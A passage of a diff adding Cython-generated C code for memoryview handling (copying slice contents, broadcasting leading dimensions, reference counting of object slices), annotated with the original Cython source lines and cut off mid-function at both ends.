Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + void *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":1273 + * Check for overlapping memory and verify the shapes. + * """ + * cdef void *tmpdata = NULL # <<<<<<<<<<<<<< + * cdef size_t itemsize = src.memview.view.itemsize + * cdef int i + */ + __pyx_v_tmpdata = NULL; + + /* "View.MemoryView":1274 + * """ + * cdef void *tmpdata = NULL + * cdef size_t itemsize = src.memview.view.itemsize # <<<<<<<<<<<<<< + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) + */ + __pyx_t_1 = __pyx_v_src.memview->view.itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":1276 + * cdef size_t itemsize = src.memview.view.itemsize + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) # <<<<<<<<<<<<<< + * cdef bint broadcasting = False + * cdef bint direct_copy = False + */ + __pyx_v_order = __pyx_get_best_slice_order((&__pyx_v_src), __pyx_v_src_ndim); + + /* "View.MemoryView":1277 + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) + * cdef bint broadcasting = False # <<<<<<<<<<<<<< + * cdef bint direct_copy = False + * cdef __Pyx_memviewslice tmp + */ + __pyx_v_broadcasting = 0; + + /* "View.MemoryView":1278 + * cdef char order = get_best_order(&src, src_ndim) + * cdef bint broadcasting = False + * cdef bint direct_copy = False # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice tmp + * + */ + __pyx_v_direct_copy = 0; + + /* "View.MemoryView":1281 + * cdef __Pyx_memviewslice tmp + * + * if src_ndim < dst_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + */ + __pyx_t_2 = (__pyx_v_src_ndim < __pyx_v_dst_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1282 + * + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) # <<<<<<<<<<<<<< + * elif dst_ndim < src_ndim: + * broadcast_leading(&dst, dst_ndim, src_ndim) + */ + __pyx_memoryview_broadcast_leading((&__pyx_v_src), __pyx_v_src_ndim, __pyx_v_dst_ndim); + + /* "View.MemoryView":1281 + * cdef __Pyx_memviewslice tmp + * + * if src_ndim < dst_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1283 + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + */ + __pyx_t_2 = (__pyx_v_dst_ndim < __pyx_v_src_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1284 + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + * broadcast_leading(&dst, dst_ndim, src_ndim) # <<<<<<<<<<<<<< + * + * cdef int ndim = max(src_ndim, dst_ndim) + */ + __pyx_memoryview_broadcast_leading((&__pyx_v_dst), __pyx_v_dst_ndim, __pyx_v_src_ndim); + + /* "View.MemoryView":1283 + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + */ + } + __pyx_L3:; + + /* "View.MemoryView":1286 + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + * cdef int ndim = max(src_ndim, dst_ndim) # <<<<<<<<<<<<<< + * + * for i in range(ndim): + */ + __pyx_t_3 = __pyx_v_dst_ndim; + __pyx_t_4 = __pyx_v_src_ndim; + if ((__pyx_t_3 > __pyx_t_4)) { + __pyx_t_5 = __pyx_t_3; + } else { + __pyx_t_5 = __pyx_t_4; + } + __pyx_v_ndim = __pyx_t_5; + + /* "View.MemoryView":1288 + * cdef int ndim = max(src_ndim, dst_ndim) + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: + */ + __pyx_t_5 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_5; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1289 + * + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: # <<<<<<<<<<<<<< + * if src.shape[i] == 1: + * broadcasting = True + */ + __pyx_t_2 = ((__pyx_v_src.shape[__pyx_v_i]) != (__pyx_v_dst.shape[__pyx_v_i])); + if (__pyx_t_2) { + + /* "View.MemoryView":1290 + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: # <<<<<<<<<<<<<< + * broadcasting = True + * src.strides[i] = 0 + */ + __pyx_t_2 = ((__pyx_v_src.shape[__pyx_v_i]) == 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1291 + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: + * broadcasting = True # <<<<<<<<<<<<<< + * src.strides[i] = 0 + * else: + */ + __pyx_v_broadcasting = 1; + + /* "View.MemoryView":1292 + * if src.shape[i] == 1: + * broadcasting = True + * src.strides[i] = 0 # <<<<<<<<<<<<<< + * else: + * _err_extents(i, dst.shape[i], src.shape[i]) + */ + (__pyx_v_src.strides[__pyx_v_i]) = 0; + + /* "View.MemoryView":1290 + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: # <<<<<<<<<<<<<< + * broadcasting = True + * src.strides[i] = 0 + */ + goto __pyx_L7; + } + + /* "View.MemoryView":1294 + * src.strides[i] = 0 + * else: + * _err_extents(i, dst.shape[i], src.shape[i]) # <<<<<<<<<<<<<< + * + * if src.suboffsets[i] >= 0: + */ + /*else*/ { + __pyx_t_6 = __pyx_memoryview_err_extents(__pyx_v_i, (__pyx_v_dst.shape[__pyx_v_i]), (__pyx_v_src.shape[__pyx_v_i])); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1294, __pyx_L1_error) + } + __pyx_L7:; + + /* "View.MemoryView":1289 + * + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: # <<<<<<<<<<<<<< + * if src.shape[i] == 1: + * broadcasting = True + */ + } + + /* "View.MemoryView":1296 + * _err_extents(i, dst.shape[i], src.shape[i]) + * + * if src.suboffsets[i] >= 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + */ + __pyx_t_2 = ((__pyx_v_src.suboffsets[__pyx_v_i]) >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":1297 + * + * if src.suboffsets[i] >= 0: + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) # <<<<<<<<<<<<<< + * + * if slices_overlap(&src, &dst, ndim, itemsize): + */ + __pyx_t_6 = __pyx_memoryview_err_dim(PyExc_ValueError, __pyx_kp_s_Dimension_d_is_not_direct, __pyx_v_i); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1297, __pyx_L1_error) + + /* "View.MemoryView":1296 + * _err_extents(i, dst.shape[i], src.shape[i]) + * + * if src.suboffsets[i] >= 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + */ + } + } + + /* "View.MemoryView":1299 + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + * if slices_overlap(&src, &dst, ndim, itemsize): # <<<<<<<<<<<<<< + * + * if not slice_is_contig(src, order, ndim): + */ + __pyx_t_2 = __pyx_slices_overlap((&__pyx_v_src), (&__pyx_v_dst), __pyx_v_ndim, __pyx_v_itemsize); + if (__pyx_t_2) { + + /* "View.MemoryView":1301 + * if slices_overlap(&src, &dst, ndim, itemsize): + * + * if not slice_is_contig(src, order, ndim): # <<<<<<<<<<<<<< + * order = get_best_order(&dst, ndim) + * + */ + __pyx_t_2 = (!__pyx_memviewslice_is_contig(__pyx_v_src, __pyx_v_order, __pyx_v_ndim)); + if (__pyx_t_2) { + + /* "View.MemoryView":1302 + * + * if not slice_is_contig(src, order, ndim): + * order = get_best_order(&dst, ndim) # <<<<<<<<<<<<<< + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) + */ + __pyx_v_order = __pyx_get_best_slice_order((&__pyx_v_dst), __pyx_v_ndim); + + /* "View.MemoryView":1301 + * if slices_overlap(&src, &dst, ndim, itemsize): + * + * if not slice_is_contig(src, order, ndim): # <<<<<<<<<<<<<< + * order = get_best_order(&dst, ndim) + * + */ + } + + /* "View.MemoryView":1304 + * order = get_best_order(&dst, ndim) + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) # <<<<<<<<<<<<<< + * src = tmp + * + */ + __pyx_t_7 = __pyx_memoryview_copy_data_to_temp((&__pyx_v_src), (&__pyx_v_tmp), __pyx_v_order, __pyx_v_ndim); if (unlikely(__pyx_t_7 == ((void *)NULL))) __PYX_ERR(1, 1304, __pyx_L1_error) + __pyx_v_tmpdata = __pyx_t_7; + + /* "View.MemoryView":1305 + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) + * src = tmp # <<<<<<<<<<<<<< + * + * if not broadcasting: + */ + __pyx_v_src = __pyx_v_tmp; + + /* "View.MemoryView":1299 + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + * if slices_overlap(&src, &dst, ndim, itemsize): # <<<<<<<<<<<<<< + * + * if not slice_is_contig(src, order, ndim): + */ + } + + /* "View.MemoryView":1307 + * src = tmp + * + * if not broadcasting: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (!__pyx_v_broadcasting); + if (__pyx_t_2) { + + /* "View.MemoryView":1310 + * + * + * if slice_is_contig(src, 'C', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + */ + __pyx_t_2 = __pyx_memviewslice_is_contig(__pyx_v_src, 'C', __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1311 + * + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) # <<<<<<<<<<<<<< + * elif slice_is_contig(src, 'F', ndim): + * direct_copy = slice_is_contig(dst, 'F', ndim) + */ + __pyx_v_direct_copy = __pyx_memviewslice_is_contig(__pyx_v_dst, 'C', __pyx_v_ndim); + + /* "View.MemoryView":1310 + * + * + * if slice_is_contig(src, 'C', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + */ + goto __pyx_L12; + } + + /* "View.MemoryView":1312 + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + */ + __pyx_t_2 = __pyx_memviewslice_is_contig(__pyx_v_src, 'F', __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1313 + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + * direct_copy = slice_is_contig(dst, 'F', ndim) # <<<<<<<<<<<<<< + * + * if direct_copy: + */ + __pyx_v_direct_copy = __pyx_memviewslice_is_contig(__pyx_v_dst, 'F', __pyx_v_ndim); + + /* "View.MemoryView":1312 + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + */ + } + __pyx_L12:; + + /* "View.MemoryView":1315 + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + * if direct_copy: # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + if (__pyx_v_direct_copy) { + + /* "View.MemoryView":1317 + * if direct_copy: + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1318 + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) # <<<<<<<<<<<<<< + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) + */ + (void)(memcpy(__pyx_v_dst.data, __pyx_v_src.data, __pyx_memoryview_slice_get_size((&__pyx_v_src), __pyx_v_ndim))); + + /* "View.MemoryView":1319 + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * free(tmpdata) + * return 0 + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1320 + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) # <<<<<<<<<<<<<< + * return 0 + * + */ + free(__pyx_v_tmpdata); + + /* "View.MemoryView":1321 + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) + * return 0 # <<<<<<<<<<<<<< + * + * if order == 'F' == get_best_order(&dst, ndim): + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":1315 + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + * if direct_copy: # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + } + + /* "View.MemoryView":1307 + * src = tmp + * + * if not broadcasting: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":1323 + * return 0 + * + * if order == 'F' == get_best_order(&dst, ndim): # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (__pyx_v_order == 'F'); + if (__pyx_t_2) { + __pyx_t_2 = ('F' == __pyx_get_best_slice_order((&__pyx_v_dst), __pyx_v_ndim)); + } + if (__pyx_t_2) { + + /* "View.MemoryView":1326 + * + * + * transpose_memslice(&src) # <<<<<<<<<<<<<< + * transpose_memslice(&dst) + * + */ + __pyx_t_5 = __pyx_memslice_transpose((&__pyx_v_src)); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 1326, __pyx_L1_error) + + /* "View.MemoryView":1327 + * + * transpose_memslice(&src) + * transpose_memslice(&dst) # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + __pyx_t_5 = __pyx_memslice_transpose((&__pyx_v_dst)); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 1327, __pyx_L1_error) + + /* "View.MemoryView":1323 + * return 0 + * + * if order == 'F' == get_best_order(&dst, ndim): # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":1329 + * transpose_memslice(&dst) + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * copy_strided_to_strided(&src, &dst, ndim, itemsize) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1330 + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * copy_strided_to_strided(&src, &dst, ndim, itemsize) # <<<<<<<<<<<<<< + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * + */ + copy_strided_to_strided((&__pyx_v_src), (&__pyx_v_dst), __pyx_v_ndim, __pyx_v_itemsize); + + /* "View.MemoryView":1331 + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * copy_strided_to_strided(&src, &dst, ndim, itemsize) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * + * free(tmpdata) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1333 + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * + * free(tmpdata) # <<<<<<<<<<<<<< + * return 0 + * + */ + free(__pyx_v_tmpdata); + + /* "View.MemoryView":1334 + * + * free(tmpdata) + * return 0 # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_broadcast_leading') + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":1265 + * + * @cname('__pyx_memoryview_copy_contents') + * cdef int memoryview_copy_contents(__Pyx_memviewslice src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice dst, + * int src_ndim, int dst_ndim, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.memoryview_copy_contents", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1337 + * + * @cname('__pyx_memoryview_broadcast_leading') + * cdef void broadcast_leading(__Pyx_memviewslice *mslice, # <<<<<<<<<<<<<< + * int ndim, + * int ndim_other) noexcept nogil: + */ + +static void __pyx_memoryview_broadcast_leading(__Pyx_memviewslice *__pyx_v_mslice, int __pyx_v_ndim, int __pyx_v_ndim_other) { + int __pyx_v_i; + int __pyx_v_offset; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + + /* "View.MemoryView":1341 + * int ndim_other) noexcept nogil: + * cdef int i + * cdef int offset = ndim_other - ndim # <<<<<<<<<<<<<< + * + * for i in range(ndim - 1, -1, -1): + */ + __pyx_v_offset = (__pyx_v_ndim_other - __pyx_v_ndim); + + /* "View.MemoryView":1343 + * cdef int offset = ndim_other - ndim + * + * for i in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] + */ + for (__pyx_t_1 = (__pyx_v_ndim - 1); __pyx_t_1 > -1; __pyx_t_1-=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":1344 + * + * for i in range(ndim - 1, -1, -1): + * mslice.shape[i + offset] = mslice.shape[i] # <<<<<<<<<<<<<< + * mslice.strides[i + offset] = mslice.strides[i] + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + */ + (__pyx_v_mslice->shape[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->shape[__pyx_v_i]); + + /* "View.MemoryView":1345 + * for i in range(ndim - 1, -1, -1): + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] # <<<<<<<<<<<<<< + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + * + */ + (__pyx_v_mslice->strides[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1346 + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] # <<<<<<<<<<<<<< + * + * for i in range(offset): + */ + (__pyx_v_mslice->suboffsets[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->suboffsets[__pyx_v_i]); + } + + /* "View.MemoryView":1348 + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + * + * for i in range(offset): # <<<<<<<<<<<<<< + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] + */ + __pyx_t_1 = __pyx_v_offset; + __pyx_t_2 = __pyx_t_1; + for (__pyx_t_3 = 0; __pyx_t_3 < __pyx_t_2; __pyx_t_3+=1) { + __pyx_v_i = __pyx_t_3; + + /* "View.MemoryView":1349 + * + * for i in range(offset): + * mslice.shape[i] = 1 # <<<<<<<<<<<<<< + * mslice.strides[i] = mslice.strides[0] + * mslice.suboffsets[i] = -1 + */ + (__pyx_v_mslice->shape[__pyx_v_i]) = 1; + + /* "View.MemoryView":1350 + * for i in range(offset): + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] # <<<<<<<<<<<<<< + * mslice.suboffsets[i] = -1 + * + */ + (__pyx_v_mslice->strides[__pyx_v_i]) = (__pyx_v_mslice->strides[0]); + + /* "View.MemoryView":1351 + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] + * mslice.suboffsets[i] = -1 # <<<<<<<<<<<<<< + * + * + */ + (__pyx_v_mslice->suboffsets[__pyx_v_i]) = -1L; + } + + /* "View.MemoryView":1337 + * + * @cname('__pyx_memoryview_broadcast_leading') + * cdef void broadcast_leading(__Pyx_memviewslice *mslice, # <<<<<<<<<<<<<< + * int ndim, + * int ndim_other) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1359 + * + * @cname('__pyx_memoryview_refcount_copying') + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: # <<<<<<<<<<<<<< + * + * if dtype_is_object: + */ + +static void __pyx_memoryview_refcount_copying(__Pyx_memviewslice *__pyx_v_dst, int __pyx_v_dtype_is_object, int __pyx_v_ndim, int __pyx_v_inc) { + + /* "View.MemoryView":1361 + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: + * + * if dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) + * + */ + if (__pyx_v_dtype_is_object) { + + /* "View.MemoryView":1362 + * + * if dtype_is_object: + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + */ + __pyx_memoryview_refcount_objects_in_slice_with_gil(__pyx_v_dst->data, __pyx_v_dst->shape, __pyx_v_dst->strides, __pyx_v_ndim, __pyx_v_inc); + + /* "View.MemoryView":1361 + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: + * + * if dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) + * + */ + } + + /* "View.MemoryView":1359 + * + * @cname('__pyx_memoryview_refcount_copying') + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: # <<<<<<<<<<<<<< + * + * if dtype_is_object: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1365 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + * cdef void refcount_objects_in_slice_with_gil(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + */ + +static void __pyx_memoryview_refcount_objects_in_slice_with_gil(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, int __pyx_v_inc) { + __Pyx_RefNannyDeclarations + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("refcount_objects_in_slice_with_gil", 0); + + /* "View.MemoryView":1368 + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + * refcount_objects_in_slice(data, shape, strides, ndim, inc) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + */ + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_data, __pyx_v_shape, __pyx_v_strides, __pyx_v_ndim, __pyx_v_inc); + + /* "View.MemoryView":1365 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + * cdef void refcount_objects_in_slice_with_gil(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif +} + +/* "View.MemoryView":1371 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + * cdef void refcount_objects_in_slice(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + */ + +static void __pyx_memoryview_refcount_objects_in_slice(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, int __pyx_v_inc) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + Py_ssize_t __pyx_v_stride; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + __Pyx_RefNannySetupContext("refcount_objects_in_slice", 0); + + /* "View.MemoryView":1374 + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] # <<<<<<<<<<<<<< + * + * for i in range(shape[0]): + */ + __pyx_v_stride = (__pyx_v_strides[0]); + + /* "View.MemoryView":1376 + * cdef Py_ssize_t stride = strides[0] + * + * for i in range(shape[0]): # <<<<<<<<<<<<<< + * if ndim == 1: + * if inc: + */ + __pyx_t_1 = (__pyx_v_shape[0]); + __pyx_t_2 = __pyx_t_1; + for (__pyx_t_3 = 0; __pyx_t_3 < __pyx_t_2; __pyx_t_3+=1) { + __pyx_v_i = __pyx_t_3; + + /* "View.MemoryView":1377 + * + * for i in range(shape[0]): + * if ndim == 1: # <<<<<<<<<<<<<< + * if inc: + * Py_INCREF(( data)[0]) + */ + __pyx_t_4 = (__pyx_v_ndim == 1); + if (__pyx_t_4) { + + /* "View.MemoryView":1378 + * for i in range(shape[0]): + * if ndim == 1: + * if inc: # <<<<<<<<<<<<<< + * Py_INCREF(( data)[0]) + * else: + */ + if (__pyx_v_inc) { + + /* "View.MemoryView":1379 + * if ndim == 1: + * if inc: + * Py_INCREF(( data)[0]) # <<<<<<<<<<<<<< + * else: + * Py_DECREF(( data)[0]) + */ + Py_INCREF((((PyObject **)__pyx_v_data)[0])); + + /* "View.MemoryView":1378 + * for i in range(shape[0]): + * if ndim == 1: + * if inc: # <<<<<<<<<<<<<< + * Py_INCREF(( data)[0]) + * else: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":1381 + * Py_INCREF(( data)[0]) + * else: + * Py_DECREF(( data)[0]) # <<<<<<<<<<<<<< + * else: + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) + */ + /*else*/ { + Py_DECREF((((PyObject **)__pyx_v_data)[0])); + } + __pyx_L6:; + + /* "View.MemoryView":1377 + * + * for i in range(shape[0]): + * if ndim == 1: # <<<<<<<<<<<<<< + * if inc: + * Py_INCREF(( data)[0]) + */ + goto __pyx_L5; + } + + /* "View.MemoryView":1383 + * Py_DECREF(( data)[0]) + * else: + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) # <<<<<<<<<<<<<< + * + * data += stride + */ + /*else*/ { + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_data, (__pyx_v_shape + 1), (__pyx_v_strides + 1), (__pyx_v_ndim - 1), __pyx_v_inc); + } + __pyx_L5:; + + /* "View.MemoryView":1385 + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) + * + * data += stride # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + + /* "View.MemoryView":1371 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + * cdef void refcount_objects_in_slice(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":1391 + * + * @cname('__pyx_memoryview_slice_assign_scalar') + * cdef void slice_assign_scalar(__Pyx_memviewslice *dst, int ndim, # <<<<<<<<<<<<<< + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + */ + +static void __pyx_memoryview_slice_assign_scalar(__Pyx_memviewslice *__pyx_v_dst, int __pyx_v_ndim, size_t __pyx_v_itemsize, void *__pyx_v_item, int __pyx_v_dtype_is_object) { + + /* "View.MemoryView":1394 + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + * refcount_copying(dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) + * refcount_copying(dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying(__pyx_v_dst, __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1395 + * bint dtype_is_object) noexcept nogil: + * refcount_copying(dst, dtype_is_object, ndim, inc=False) + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) # <<<<<<<<<<<<<< + * refcount_copying(dst, dtype_is_object, ndim, inc=True) + * + */ + __pyx_memoryview__slice_assign_scalar(__pyx_v_dst->data, __pyx_v_dst->shape, 